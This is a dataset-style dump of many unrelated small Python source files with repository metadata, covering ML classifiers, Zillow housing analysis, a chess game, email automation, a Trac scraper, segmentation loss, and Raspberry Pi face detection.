def run_logistic_regression( X_train, X_test, y_train, y_test):
first_time = datetime.datetime.now()
logistic_regression(X_train, X_test, y_train, y_test)
later_time = datetime.datetime.now()
difference = later_time - first_time
print('Tempo Regressão Logística: ' + str(difference.microseconds) + ' segundos')
if __name__ == '__main__':
process()
X_train, X_test, y_train, y_test = bag_of_words()
run_naive_bayes( X_train, X_test, y_train, y_test)
run_decision_three( X_train, X_test, y_train, y_test)
run_svm(X_train, X_test, y_train, y_test)
run_multi_layer_perceptron(X_train, X_test, y_train, y_test)
run_logistic_regression(X_train, X_test, y_train, y_test)
| true |
094254efa341cc68c975f24e7ce80a1f00fdfc09 | Python | kkjoboy/ZillowHousingMarketAnalysis | /HouseAnalysis.py | UTF-8 | 12,548 | 3.125 | 3 | [
"MIT"
] | permissive | # Author: Joshua Mielke
#
import csv
##########################################################################################################################
# Post-Processing & Data Loading Data Dictionaries, used for calculating ranks
# Ranking Data Dictionaries, lowest aggregate number is highest rank
#
# Should be a dictionary of dictionaries, keys being zip codes and values being another dictionary of different values
# such as '3MonthMovingAverageRent' : 1253 | 'RentHomePricePercent' : 1.2 | 'RentGrowthMovingAverage' : 3.5
#
# Ranking values include:
# 1. AverageRent - Average rent from 3 month moving average
# NOTE: This is the value of the latest ZRI
# 2. OnePercentRule - TODO Used for calculating rent divided by total cost of house
# 3. RentGrowth - 3 month moving average of rent growth
# 4. PriceAppreciation - TODO 3 month moving average of price appreciation based on ZHVI home values
# 5. PriceAppreciationSqft - TODO 3 month moving average of price appreciation by square footage
# 6. PctPriceCuts - TODO Percent of SFRs that have cuts in price (high = less desirable, low = more desirable)
# 7. AverageHomeValue - Average home value from ZHVI
##########################################################################################################################
ComputedData = {}
ZipCodeRankings = {}
Header = []
# Global Data Stores (Note: Uses lots of memory to hold global arrays of the excel file)
rentPriceData = {}
housePriceData = {}
priceAdjustmentData = {}
# Filters
RentHomePricePercent = 1.0
##########################################################################################################################
# ZRI Time Series SFR ($) - Zillow [Rental Values]
#
# The Zillow Rent Index (ZRI) is a smooth measure of the median estimated market rate rent across a given region and
# housing type. This value will be used in conjuction with the Median Rent List Price to calculate a median rental rate
# across a given Zip Code. The median rental rate will be used with the median home value to calculate a rank based on
# ratio of rent to home value.
##########################################################################################################################
# Loads the ZRI Rental Prices for Single Family Residences (SFR) data from Zillow
def loadZRIRentalPriceSFRZillow():
# Open ZRI Rental Prices for Single Family Residences by Zip Code
with open ('Zip_Zri_SingleFamilyResidenceRental.csv', newline='', encoding='utf-8') as ZRIRentalPriceSFRCSV:
# Create the CSV reader to collect excel information
ZRIRentalPriceReader = csv.reader(ZRIRentalPriceSFRCSV, delimiter=',')
header = next(ZRIRentalPriceReader)
for headerVal in header:
Header.append(headerVal)
# Loop through values in the CSV, starting at index 1 (skip header)
for row in ZRIRentalPriceReader:
timeSeriesHeader = []
timeSeriesPrices = []
# Loop through each row
for x, value in enumerate(row, start=0):
if x > 6:
timeSeriesHeader.append(header[x])
timeSeriesPrices.append(value)
rentPriceData[row[1]] = [row[2], row[3], row[4], row[5], row[6], timeSeriesHeader, timeSeriesPrices]
def loadAverageRent():
# Grab each zip code and load average rent into computed data
for row in rentPriceData:
# Check to make sure if Zip Code already exists in Computed Data, otherwise add it
# TODO Change the ordering to use a hashmap from header to ensure correct matching from different headers
if row not in ComputedData:
ComputedData[row] = {}
ComputedData[row][Header[2]] = rentPriceData[row][0] # City
ComputedData[row][Header[3]] = rentPriceData[row][1] # State
ComputedData[row][Header[4]] = rentPriceData[row][2] # Metro
ComputedData[row][Header[5]] = rentPriceData[row][3] # County
ComputedData[row][Header[6]] = rentPriceData[row][4] # Size Rank
# Grab last rent value in timeSeriesPrices (ZRI already calculates 3 month moving average for rent) and add to
# the ComputedData
rentEntriesLen = len(rentPriceData[row][6])
ComputedData[row]['AverageRent'] = rentPriceData[row][6][rentEntriesLen-1] # Most Recent Rental Average (3 Month Moving Average)
def loadRentGrowth():
# Grab each zip code and load average rent into computed data
for zipcode in rentPriceData:
# Check to make sure if Zip Code already exists in Computed Data, otherwise add it
if zipcode not in ComputedData:
ComputedData[zipcode] = {}
ComputedData[zipcode][Header[2]] = rentPriceData[zipcode][0] # City
ComputedData[zipcode][Header[3]] = rentPriceData[zipcode][1] # State
ComputedData[zipcode][Header[4]] = rentPriceData[zipcode][2] # Metro
ComputedData[zipcode][Header[5]] = rentPriceData[zipcode][3] # County
ComputedData[zipcode][Header[6]] = rentPriceData[zipcode][4] # Size Rank
rentGrowthList = []
first = None
second = None
third = None
prev = None
# Calculate rent growth from past 5 years of data and store in rentGrowthList
for rentValue in rentPriceData[zipcode][6][-30:]:
# Shift values for moving average (3 point moving average)
first = second
second = third
if prev is not None:
third = (int(rentValue) - prev) / prev * 100
# None check
if first is not None and second is not None and third is not None:
movingAverage = (first + second + third) / 3 # Calculate moving average with new value
rentGrowthList.append(movingAverage) # Add new value to moving average list
prev = int(rentValue) # Store previous value for next iteration
# Calculate 3 Month Moving Average of rent growth
rentGrowth = sum(rentGrowthList) / len(rentGrowthList)
# print(zipcode + ": " + str(rentGrowth))
# Store average rent growth in ComputedData
ComputedData[zipcode]['RentGrowth'] = rentGrowth
##########################################################################################################################
# Median List Price ($ Per Square Foot) - Zillow [Rental Values]
##########################################################################################################################
#TBD
##########################################################################################################################
# Median Rent List Price ($ Per Square Foot), Single-Family Residence - Zillow [Rental Listings]
##########################################################################################################################
#TBD
##########################################################################################################################
# ZHVI Single-Family Homes Time Series ($) - Zillow [Home Values]
##########################################################################################################################
# Loads the ZHVI Home Prices for Single Family Residences (SFR) data from Zillow
def loadZHVIHomePriceSFRZillow():
# Open ZRI Rental Prices for Single Family Residences by Zip Code
with open ('Zip_Zhvi_SingleFamilyResidence.csv', newline='', encoding='utf-8') as ZHVIHomePriceSFRCSV:
# Create the CSV reader to collect excel information
ZHVIHomePriceReader = csv.reader(ZHVIHomePriceSFRCSV, delimiter=',')
header = next(ZHVIHomePriceReader)
#print(header)
# Loop through values in the CSV, enumerate starting at index 1 (skip header)
for row in ZHVIHomePriceReader:
#print(row)
timeSeriesHeader = []
timeSeriesPrices = []
# Loop through each row
for x, value in enumerate(row, start=0):
if x > 6:
timeSeriesHeader.append(header[x])
timeSeriesPrices.append(value)
housePriceData[row[1]] = [row[2], row[3], row[4], row[5], row[6], timeSeriesHeader, timeSeriesPrices]
# Gets the average home value for each zip code
def getAverageHomeValue():
for zipcode in housePriceData:
# Check to see if zipcode is in our ComputedData
if zipcode not in ComputedData:
ComputedData[zipcode] = {}
ComputedData[zipcode][Header[2]] = housePriceData[zipcode][0] # City
ComputedData[zipcode][Header[3]] = housePriceData[zipcode][1] # State
ComputedData[zipcode][Header[4]] = housePriceData[zipcode][2] # Metro
ComputedData[zipcode][Header[5]] = housePriceData[zipcode][3] # County
ComputedData[zipcode][Header[6]] = housePriceData[zipcode][4] # Size Rank
# Grab last value of house price data and append as the average house value
# TODO Fix this hacky shit to grab last value
for value in housePriceData[zipcode][6][-1:]:
print(zipcode + ": " + value)
ComputedData[zipcode]['AverageHomeValue'] = value
##########################################################################################################################
# Monthly Home Sales (Number, Seasonally Adjusted) - Zillow [Home Listings and Sales]
##########################################################################################################################
#TBD
##########################################################################################################################
# Monthly For-Sale Inventory (Number, Seasonally Adjusted) - Zillow [Home Listings and Sales]
##########################################################################################################################
#TBD
##########################################################################################################################
# New Monthly For-Sale Inventory (Number, Seasonally Adjusted) - Zillow [Home Listings and Sales]
##########################################################################################################################
#TBD
##########################################################################################################################
# Listings With Price Cut - Seasonally Adjusted, SFR (%) - Zillow [Home Listings and Sales]
##########################################################################################################################
# Loads the Listings With Price Cut - Seasonally Adjusted, SFR (%) data from Zillow
def loadZipListingsPriceCutSeasAdjZillow():
# Open ZRI Rental Prices for Single Family Residences by Zip Code
with open ('Zip_Listings_PriceCut_SeasAdj_SingleFamilyResidence.csv', newline='', encoding='utf-8') as ListingPriceCutSeasAdjCSV:
# Create the CSV reader to collect excel information
ListingPriceCutSeasAdjReader = csv.reader(ListingPriceCutSeasAdjCSV, delimiter=',')
header = next(ListingPriceCutSeasAdjReader)
#print(header)
# Loop through values in the CSV, enumerate starting at index 1 (skip header)
for row in ListingPriceCutSeasAdjReader:
#print(row)
timeSeriesHeader = []
timeSeriesPrices = []
# Loop through each row
for x, value in enumerate(row, start=0):
if x > 6:
timeSeriesHeader.append(header[x])
timeSeriesPrices.append(value)
housePriceData[row[1]] = [row[2], row[3], row[4], row[5], row[6], timeSeriesHeader, timeSeriesPrices]
##########################################################################################################################
# Main Function
##########################################################################################################################
def main():
# Load different spreadsheets
loadZRIRentalPriceSFRZillow()
loadZHVIHomePriceSFRZillow()
# Use rentPriceData to add average rent to computed data
loadAverageRent()
# Use rentPriceData to add rent growth to computed data
loadRentGrowth()
getAverageHomeValue()
if __name__ == "__main__":
main() | true |
ce1a228a0c46e5b168d91e5fb947fef118b039af | Python | theabhishekmandal/Python | /defining_functions/demo4.py | UTF-8 | 232 | 3.75 | 4 | [] | no_license | '''
In this function example we are implementing that ,there can be arbitrary number of arguments
'''
def hello(*args,sep=' '):
return sep.join(args)
print(hello('abhishek','mandal','is','here'))
print(hello('what','are','you')) | true |
03278ad2f822bdf475532f596b6e3c6edbc2c54f | Python | harishtallam/Learning-Python | /Learn_Python_by_Udemy_Navin/6_Functions/2_functions_with_args.py | UTF-8 | 569 | 3.953125 | 4 | [] | no_license |
# Example 1
def update(x):
x = 8
print(x)
update(10) # Here, even after passing 10 as an argument. value 8 is overwritten in function
# Example 2
def update(x):
x = 8
print("x: ", x)
a = 10
update(a)
print("a: ", a)
# Example 3
def update(x1):
print(id(x1))
x1 = 8
print(id(x1))
print("x1: ", x1)
a1 = 10
print(id(a1))
update(a1)
print("a1: ", a1)
# Example 4
def update(lst):
print(id(lst))
lst[1] = 40
print(id(lst))
print("lst: ", lst)
lst = [10, 20, 30]
print(id(lst))
update(lst)
print("lst: ", lst)
| true |
983e3b4a792df2cfd2d9ce5ea135f82f7fc154b2 | Python | piccicla/pysdss | /pysdss/multicriteria/weight/pairwise.py | UTF-8 | 3,733 | 3.5625 | 4 | [] | no_license | # -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: pairwise.py
# Purpose: criterion weighting with pairwise comparison
#
#
# Author: claudio piccinini
#
# Updated: 11/04/2017
# -------------------------------------------------------------------------------
import numpy as np
def get_consistency_ratio(n):
"""
Get the random inconsistency index for the current number of evaluation criteria
:param n: the number of evaluation criteria
:return: the random
"""
#random inconsistency indices (Saaty, 1980)
ri = {1:0,2:0,3:0.58,4:0.90,5:1.12,6:1.24,7:1.32,8:1.41,9:1.45,10:1.49,11:1.51,12:1.48,13:1.56,
14:1.57,15:1.59}
return ri[n]
def pairwise_comparison(matrix):
"""
Pairwise comparison for the analytic hierarchy process(Saary,1980)
return consistency_ratio and a list with criterion_weights
consitency ratio must be <0.10 otherwise the pairwise comparison matrix must be recalculated
:param matrix: The pairwise comparison matrix of the evaluation criteria as a numpy array
The pairwise comparison matrix scores should follow this table
1 Equal importance
2 Equal to moderate importance
3 Moderate importance
4 Moderate to strong importance
5 Strong importance
6 Strong to very strong importance
7 Very strong importance
8 Very to extremely strong importance
9 Extreme importance
:return: consistency_ratio and a list with criterion_weights
"""
if matrix.shape[0] != matrix.shape[1]:
raise ValueError("The method needs a square matrix")
n_elements = matrix.shape[0]
if n_elements < 3 or n_elements > 15:
raise ValueError("The pairwise comparison matrix needs 3 to 15 elements")
original_matrix = np.copy(matrix)
#####CRITERION WEIGHTS########
# step1 calculate sum of columns
column_total = [np.sum(matrix[:,i]) for i in range(matrix.shape[1])]
# step2 normalized pairwise comparison matrix
for i, s in enumerate(column_total):
matrix[:, i] = matrix[:, i]/s
#step3 compute criterion weights as average values by row
criterion_weights=[np.sum(matrix[i, :])/matrix.shape[1] for i in range(matrix.shape[1])]
#####CONSISTENCY RATIO#####
# step1
for i, s in enumerate(criterion_weights):
original_matrix[:, i] = original_matrix[:, i]*s
sum_by_row = np.sum(original_matrix,axis=1)
# step2
consistency_vector = sum_by_row/np.array(criterion_weights)
lmbda = np.mean(consistency_vector)
consistency_index = (lmbda - n_elements)/ (n_elements-1)
consistency_ratio = consistency_index/get_consistency_ratio( n_elements)
return consistency_ratio, criterion_weights
if __name__ == "__main__":
print("#######PAIRWISE COMPARISON######")
print("#######INCONSISTENT COMPARISON######")
pcm = np.array([[1, 4, 7],
[1/4, 1, 5],
[1/7, 1/5, 1]])
print(pairwise_comparison(pcm))
print("#######CONSISTENT COMPARISON######")
pcm = np.array([[1, 4, 7],
[1/4, 1, 4],
[1/7, 1/4, 1]])
print(pairwise_comparison(pcm))
print("#######WRONG COMPARISON######")
try:
pcm = np.array([[1, 4],
[1/4,1]])
print(pairwise_comparison(pcm))
except ValueError as v:
print(v)
print("#######WRONG COMPARISON######")
try:
pcm = np.array([[1, 4, 7, 1],
[1 / 4, 1, 4,3],
[1 / 7, 1 / 4, 1,4]])
print(pairwise_comparison(pcm))
except ValueError as v:
print(v)
| true |
9f6714b1122fb2f5a86220af738f7c43286de98e | Python | rays2pix/selfal | /dataset.py | UTF-8 | 2,994 | 2.890625 | 3 | [] | no_license | import cv2
from PIL import Image
import os
import numpy as np
class Frame:
def __init__(self,image,labelled=0):
self.image = image
self.labelled = 0
self.rows = image.shape[0]
self.cols = image.shape[1]
class Dataset:
def __init__(self,images_dir=None,labels_dir=None,scale=1.0):
self.images_dir = images_dir
self.labels_dir = labels_dir
self.images = {}
self.labels = {}
self.label_desc = {7:('green',[0,252,0]),
8:('green',[0,252,0]),
9:('green',[0,252,0]),
1:('sky',[0,0,252]),
2:('road',[153,102,51]),
2:('road',[153,102,51]),
5:('lane',[255,255,102]),
11:('building',[255,0,255]),
17:('vehicle',[255,0,0]),
18:('vehicle',[255,0,0]),
19:('vehicle',[255,0,0]),
23:('cycle',[255,50,110]),
24:('cyclist',[110,110,110]),
}
for f in os.listdir(images_dir):
print "Loading %s" % f
image = cv2.imread(os.path.join(images_dir,f))
#image = cv2.resize(image,(image.shape[0],int(np.ceil(scale*image.shape[1]))))
self.images[f] = image
for f in os.listdir(labels_dir):
image = cv2.imread(os.path.join(labels_dir,f),0)
#image = cv2.resize(image,(image.shape[0],int(np.ceil(scale*image.shape[1]))))
self.labels[f]=image
print "Dataset_init done"
self.rows = self.images['001.png'].shape[0]
self.cols = self.images['001.png'].shape[1]
def makeRGBLabelFromInt(self,intLabel):
rows = intLabel.shape[0]
cols = intLabel.shape[1]
rgb_label = np.zeros((rows,cols,3))
int_labels = self.label_desc.keys()
for k in int_labels:
rgb_label[np.where(intLabel==k)] = self.label_desc[k][1]
data = rgb_label
rgb_label = (255.0 / data.max() * (data - data.min())).astype(np.uint8)
cv2.imwrite('rgb.png',rgb_label)
return rgb_label
def overlayRGBonImage(self,rgblabel,image):
pil_rgb = Image.fromarray(rgblabel)
pil_image = Image.fromarray(image)
background = pil_image.convert("RGBA")
overlay = pil_rgb.convert("RGBA")
new_img = Image.blend(background, overlay, 0.4)
overlayed_image = np.asarray(new_img)
return overlayed_image
if __name__ == "__main__":
kitti_data = Dataset(images_dir="./data/kitti01/images/",labels_dir="./data/kitti01/labels")
labels = kitti_data.labels.items()
images = kitti_data.images.items()
rgb_label= kitti_data.makeRGBLabelFromInt(labels[0][1])
ol = kitti_data.overlayRGBonImage(rgb_label,images[0][1])
cv2.imwrite('overlayed.png',ol)
| true |
53d0b7255633762ef805fe9a6df0a83254c8c63d | Python | npmcdn-to-unpkg-bot/Jam | /jam/Singleton.py | UTF-8 | 965 | 2.609375 | 3 | [] | no_license | # Singleton.py
from jam.models import Artists, Album
class Singleton(type):
_instances = {}
def __init__(cls, name):
if cls not in cls._instances:
cls._instances[cls] = super.__call__(*args, **kwargs)
return cls._instances[cls]
def __call__(cls):
return cls._instances[cls];
class Cache(object, metaclass = Singleton):
def __init__(self, className):
super.__init__(self, className, {"albums" : set(), "artists" : set(), "reviews": set()})
def __call__(self):
return super.__call__(self)
def searchArtist(self, name):
artistCache = self.__call__().artists
if artistCache[name]:
return artistCache[name]
return readThrough(artistCache, name)
def searchAlbum(self, name):
albumCache = self.__call__().albums
if albumCache[name]:
return albumCache[name]
return readThrough(albumCache, name)
def readThrough(cacheSet, replacement):
pass
| true |
83c15b4a593978fb43e2c286f21ff5c02d586ff9 | Python | heroming/algorithm | /leetcode/821_Shortest_Distance_to_a_Character.py | UTF-8 | 484 | 2.90625 | 3 | [] | no_license | class Solution(object) :
def shortestToChar(self, s, c) :
inf = 0x6688FF
n = len(s)
dis = [0] * n
idx = -inf
for i in xrange(n) :
if s[i] == c :
idx, dis[i] = i, 0
else :
dis[i] = i - idx
idx = inf
for i in xrange(n - 1, -1, -1) :
if s[i] == c :
idx = i
else :
dis[i] = min(dis[i], idx - i)
return dis
| true |
6acf6ef19ba9f013090ed8d2ecc207808acedc01 | Python | HokiePedro/emojipastamaker | /emojitest.py | UTF-8 | 165 | 3.25 | 3 | [] | no_license | s = u'\U0001f63b'
p = u'\U0001f355'
porc = raw_input("Type pizza or cat.")
print porc
if porc == "pizza":
print "I want a " + p
else:
print "I want a " + s
| true |
55de0ca0257051c715fd4c5c5a4214e5e0ed9c24 | Python | KMace/Chess-AI | /main.py | UTF-8 | 2,313 | 3.4375 | 3 | [] | no_license | import pygame
from game import Game
from constants import WIDTH, HEIGHT, SQUARE_SIZE, WIN, WHITE, BLACK
from minimax.algorithm import minimax
##################################################
# Still need to implement following functionality:
#
# Castles
# Pawn promotion to a rook, bishop, queen
##################################################
pygame.display.set_caption("Chess")
FPS = 60
def get_row_col_from_mouse(pos):
x, y = pos
row = y // SQUARE_SIZE
col = x // SQUARE_SIZE
return row, col
def main():
difficultyChosen = False
while not difficultyChosen:
setting = int(input("Select a difficulty: \n1) Beginner\n2) Intermediate\n3) Expert\n\n"))
print()
if setting == 1 or setting == 2 or setting == 3:
setting += 2
print("Loading game!...")
difficultyChosen = True
else:
print()
print("Please type either 1, 2 or 3")
print()
run = True
clock = pygame.time.Clock()
game = Game(WIN)
while run:
clock.tick(FPS)
if game.turn == BLACK:
value, new_board = minimax(game.get_board(), setting, True, game, float('-inf'), float('inf'))
game.ai_move(new_board)
if game.winner() != None:
print()
if game.winner() == WHITE:
print("White wins!")
else:
print("Black wins!")
run = False
# If you un-hash this subsequent code you can watch AIs play one another
#if game.turn == WHITE:
# value, new_board = minimax(game.get_board(), setting, False, game, float('-inf'), float('inf'))
# game.ai_move(new_board)
# print("White moves with an evaluation of", value)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
pos = pygame.mouse.get_pos()
row, col = get_row_col_from_mouse(pos)
game.select(row, col)
game.update()
pygame.quit()
if __name__ == "__main__":
main()
| true |
159c618c3b8ceeab85807c68d3a22a0b9c202324 | Python | jaynard1120/DSE_SDElective_ll | /neopixels_midterm.py | UTF-8 | 538 | 2.65625 | 3 | [] | no_license | from adafruit_circuitplayground import cp
from time import sleep
cp.pixels.brightness = 1
ndx = 9
while True:
for i in range(0,10):
if ndx<0:
ndx = 9
cp.pixels[ndx] = (255,255,255)
sleep(1)
if(ndx == 0 or ndx == 5):
cp.pixels[ndx] = (255,255,255)
ndx-=1
continue
if ndx == 4 or ndx == 9:
cp.pixels[0] = (0,0,0)
cp.pixels[5] = (0,0,0)
sleep(1)
cp.pixels[ndx] = (0,0,0)
ndx -=1
| true |
9fe501e9b27bc7bdcee3d25200812dd7e9651eaa | Python | 42/django-trac-learning | /getticketdata.py | UTF-8 | 1,780 | 2.53125 | 3 | [] | no_license | from bs4 import BeautifulSoup
import csv
import datetime
import urllib2
import urlparse
def get_data(ticket):
try:
url = 'https://code.djangoproject.com/ticket/%s' % ticket
ticket_html = urllib2.urlopen(url)
except urllib2.HTTPError:
print 'Failed to get "%s"' % url
return
bs = BeautifulSoup(ticket_html)
# get closing date
d = bs.find_all('div','date')[0]
try:
p = list(d.children)[3]
except IndexError:
print d
return
href = p.find('a')['href']
close_time_str = urlparse.parse_qs(href)['/timeline?from'][0]
close_time = datetime.datetime.strptime(close_time_str[:-6],
'%Y-%m-%dT%H:%M:%S')
tz_hours = int(close_time_str[-5:-3])
tz_minutes = int(close_time_str[-2:])
if close_time_str[-6]=='-':
tz_hours = -tz_hours
close_time -= datetime.timedelta(hours = tz_hours, minutes = tz_minutes)
# get description and return
de = bs.find_all('div', 'description')[0]
return close_time, de.text
tickets_file = csv.reader(open('2013-04-27.csv'))
output = csv.writer(open('2013-04-27.close.csv','w'))
tickets_file.next()
for id, time, changetime, reporter, summary, status, owner, type, component \
in tickets_file:
try:
closetime, descr = get_data(id)
except:
continue
if closetime is None: continue
row = [id]
row.extend([time,
changetime,
closetime,
reporter,
summary,
status,
owner,
type,
component,
descr.encode('utf-8'),
],
)
output.writerow(row)
print id, closetime
| true |
c391a5bcc392b47a9383e63a64c1c11642c513ac | Python | karantrehan3/Email-Automation-Python | /EmailAutomation.py | UTF-8 | 2,472 | 3.3125 | 3 | [
"MIT"
] | permissive | # Loading all the packages required
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class EmailAutomation:
def __init__(self, user_mail, password, receiver_mail, subject):
# Declaring and Initializing the User's Mail ID, User's Password, Receiver's Mail ID and Subject of the mail
self.user_mail = user_mail
self.password = password
self.receiver_mail = receiver_mail
self.subject = subject
# Calling the Build Method
self.build()
def build(self):
# Creating a Message and setting up the Headers
mail = MIMEMultipart()
mail['From'] = self.user_mail
mail['To'] = self.receiver_mail
mail['Subject'] = self.subject
# Reading the Body of the E-mail to be sent from a text file
textfile = 'textfile.txt'
with open(textfile) as fp:
body = fp.read()
# Attaching body to the mail
mail.attach(MIMEText(_text=body, _subtype='plain'))
# Calling the Send Method
self.send(mail)
def send(self,mail):
# Setting up the SMTP (Simple Mail Transfer Protocol) server
server = smtplib.SMTP(host='smtp.gmail.com', port=587)
# Putting the SMTP connection in TLS (Transport Layer Security) mode.
# All SMTP commands that follow will be encrypted.
server.starttls()
# Logging in to the SMTP server
server.login(user=self.user_mail, password=self.password)
# Sending the mail
server.send_message(from_addr=self.user_mail, to_addrs=self.receiver_mail, msg=mail)
# Terminating the SMTP session and closing the connection
server.quit()
if __name__ == '__main__':
"""
To automate the process of sending emails, we can put up an If
condition on the basis of which we can trigger the instantiation of
the object of the EmailAutomation class which in turn would send the
automated mail to the destination email address.
"""
# The condition below can be altered based on the requirements
if True:
email_object = EmailAutomation('YOUR EMAIL ADDRESS HERE',
'YOUR PASSWORD HERE',
'RECEIVER EMAIL ADDRESS HERE',
'SUBJECT OF THE EMAIL')
| true |
1c57bc0d3f2f7882a80a727f2efcf27462b5decd | Python | HAL-42/AlchemyCat | /contrib/loss/wsss/balanced_seed_loss.py | UTF-8 | 2,108 | 2.734375 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: Xiaobo Yang
@contact: hal_42@zju.edu.cn
@software: PyCharm
@file: balanced_seed_loss.py
@time: 2020/3/28 22:54
@desc:
"""
from typing import Tuple
import torch
import torch.nn.functional as F
__all__ = ['BalancedSeedloss']
class BalancedSeedloss(object):
def __init__(self, eps: float=1e-5):
"""Compute balanced seed loss
Args:
eps: Min prob allowed when clamp probs
"""
self.eps = eps
def clamp_softmax(self, score, dim=1):
probs = torch.clamp(F.softmax(score, dim), self.eps, 1)
probs = probs / torch.sum(probs, dim=dim, keepdim=True)
return probs
def __call__(self, score_map, one_hot_label) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
"""Compute balanced seed loss
Args:
score_map: (N, C, H, W) score map
one_hot_label: (N, C, H, W) one-hot label
Returns:
Balanced Seed Loss
"""
assert not one_hot_label.requires_grad
pi = one_hot_label.to(torch.float)
assert not torch.any(torch.isinf(score_map))
assert not torch.any(torch.isnan(score_map))
log_qi = torch.log(self.clamp_softmax(score_map))
assert not torch.any(torch.isnan(log_qi))
log_fg_qi = log_qi[:, 1:, :, :]
fg_pi = pi[:, 1:, :, :]
fg_count = torch.sum(fg_pi, dim=(1, 2, 3)) + self.eps
log_bg_qi = log_qi[:, 0:1, :, :]
bg_pi = pi[:, 0:1, :, :]
bg_count = torch.sum(bg_pi, dim=(1, 2, 3)) + self.eps
fg_loss_ = torch.sum(fg_pi * log_fg_qi, dim=(1, 2, 3))
fg_loss = -1 * torch.mean(fg_loss_ / fg_count) # mean reduce on batch
bg_loss_ = torch.sum(bg_pi * log_bg_qi, dim=(1, 2, 3))
bg_loss = -1 * torch.mean(bg_loss_ / bg_count) # mean reduce on batch
total_loss = bg_loss + fg_loss
assert not torch.any(torch.isnan(total_loss)), \
"fg_loss: {} fg_count: {} bg_loss: {} bg_count: {}".format(fg_loss, fg_count, bg_loss, bg_count)
return total_loss, bg_loss, fg_loss
| true |
84a5a85e418e4864d9cbd728290f40e33bedb926 | Python | srp2210/PythonBasic | /dp_w3resource_solutions/functions/7_calculate_uppercase_and_lowercase_letters_in_given_string.py | UTF-8 | 678 | 4.125 | 4 | [] | no_license | """
* @author: Divyesh Patel
* @email: pateldivyesh009@gmail.com
* @date: 23/05/20
* @decription: Write a Python function that accepts a string and calculate
the number of upper case letters and lower case letters.
"""
def get_case_counts(text):
if len(text) == 0 or not isinstance(text, str):
return None, None
upper_count = 0
lower_count = 0
for each in text:
if each.isupper():
upper_count += 1
if each.islower():
lower_count += 1
return upper_count, lower_count
total_upper, total_lower = get_case_counts('Hello World this is Divyesh Patel')
print('total upper:', total_upper)
print('total, lower:', total_lower)
| true |
0077c9e1186bcbc2a5903031961a0f4282db7e0b | Python | ruili629/Prisoner-s-Dillemma | /other examples.py | UTF-8 | 680 | 2.859375 | 3 | [] | no_license |
#example 1
# import axelrod as axl
# axl.seed(4) # for reproducible example
# players = [axl.Cooperator(), axl.Defector(),axl.TitForTat(), axl.Grudger()]
# mp = axl.MoranProcess(players, mutation_rate=0.1)
# for _ in mp:
# if len(mp.population_distribution()) == 1:
# break
# print(mp.population_distribution())
# example 2
# import axelrod as axl
# axl.seed(689)
# players = (axl.Cooperator(), axl.Defector(), axl.Defector(), axl.Defector())
# w = 0.95
# fitness_transformation = lambda score: 1 - w + w * score
# mp = axl.MoranProcess(players, turns=10, fitness_transformation=fitness_transformation)
# populations = mp.play()
# print(mp.winning_strategy_name)
| true |
54a6d8d62cf72878edbe42f64308fc3ca030913a | Python | software312/ZakuFaceDetection | /zaku_recognize.py | UTF-8 | 4,078 | 2.53125 | 3 | [] | no_license | # USAGE
# python3 zaku_recognize.py --detector face_detection_model --recognizer output/recognizer.pickle --le output/le.pickle
# import the necessary packages
from imutils.video import VideoStream
from imutils.video import FPS
from imutils.video.pivideostream import PiVideoStream
from picamera.array import PiRGBArray
from picamera import PiCamera
import numpy as np
import argparse
import imutils
import pickle
import time
import cv2
import os
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--detector", required=True,
help="path to OpenCV's deep learning face detector")
ap.add_argument("-r", "--recognizer", required=True,
help="path to model trained to recognize faces")
ap.add_argument("-l", "--le", required=True,
help="path to label encoder")
ap.add_argument("-c", "--confidence", type=float, default=0.5,
help="minimum probability to filter weak detections")
args = vars(ap.parse_args())
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join([args["detector"], "deploy.prototxt"])
modelPath = os.path.sep.join([args["detector"],
"res10_300x300_ssd_iter_140000.caffemodel"])
detector = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# load the actual face recognition model along with the label encoder
#recognizer = pickle.loads(open(args["recognizer"], "rb").read())
#le = pickle.loads(open(args["le"], "rb").read())
# initialize the video stream, then allow the camera sensor to warm up
print("[INFO] starting video stream...")
vs = PiVideoStream().start()
time.sleep(2.0)
# start the FPS throughput estimator
fps = FPS().start()
# loop over frames from the video file stream
while True:
# grab the frame from the threaded video stream
# resize the frame to have a width of 600 pixels (while
# maintaining the aspect ratio), and then grab the image
# dimensions
frame = vs.read()
frame = imutils.resize(frame, width=400)
(h, w) = frame.shape[:2]
# construct a blob from the image
imageBlob = cv2.dnn.blobFromImage(
cv2.resize(frame, (300, 300)), 1.0, (300, 300),
(104.0, 177.0, 123.0), swapRB=False, crop=False)
# apply OpenCV's deep learning-based face detector to localize
# faces in the input image
detector.setInput(imageBlob)
detections = detector.forward()
# loop over the detections
for i in range(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with
# the prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections
if confidence > args["confidence"]:
# compute the (x, y)-coordinates of the bounding box for
# the face
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype("int")
faceCenterX = (startX + endX)/2
faceCenterY = (startY + endY)/2
print("Center coordinates of face: " + faceCenterX + "," + faceCenterY )
# extract the face ROI
face = frame[startY:endY, startX:endX]
(fH, fW) = face.shape[:2]
# ensure the face width and height are sufficiently large
if fW < 20 or fH < 20:
continue
# y = startY - 10 if startY - 10 > 10 else startY + 10
cv2.rectangle(frame, (startX, startY), (endX, endY),
(0, 0, 255), 2)
# cv2.putText(frame, "hello", (startX, y),
# cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
# show the output frame
cv2.imshow("Frame", frame)
fps.update()
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# stop the timer and display FPS information
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
| true |
